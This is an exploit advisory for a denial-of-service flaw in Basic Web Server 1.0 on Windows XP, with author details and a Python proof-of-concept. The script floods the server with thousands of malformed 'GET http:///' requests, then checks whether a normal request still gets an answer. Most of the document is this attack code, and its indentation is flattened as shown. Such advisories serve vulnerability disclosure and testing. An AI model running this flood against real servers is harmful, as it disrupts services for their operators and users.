Basic Web Server version 1.0 suffers from a denial of service vulnerability.
c64a16a1215e15fdd05b0d8e52e280e1edd81d17e91c02da2ec7d8ef7d90b69b
# ------------------------------------------------------------------------
# Software................Basic Web Server 1.0
# Vulnerability...........Denial Of Service
# Download................http://www.bit4free.com/
# Release Date............9/16/2010
# Tested On...............Windows XP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# Flooding the server with malformed HTTP requests results in the server
# failing to respond to legitimate requests.
#
#
# --PoC--
import socket
host = 'localhost'
port = 80
include_file = True
complete_path = True
try:
for i in range(0, 1024):
for x in range(0, 8):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(2)
s.send('GET http:/// HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')
print '.',
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(2)
s.send('GET / HTTP/1.1\r\n'
'Host: ' + host + '\r\n\r\n')
s.recv(8192)
print 'response received'
except:
print 'error contacting server'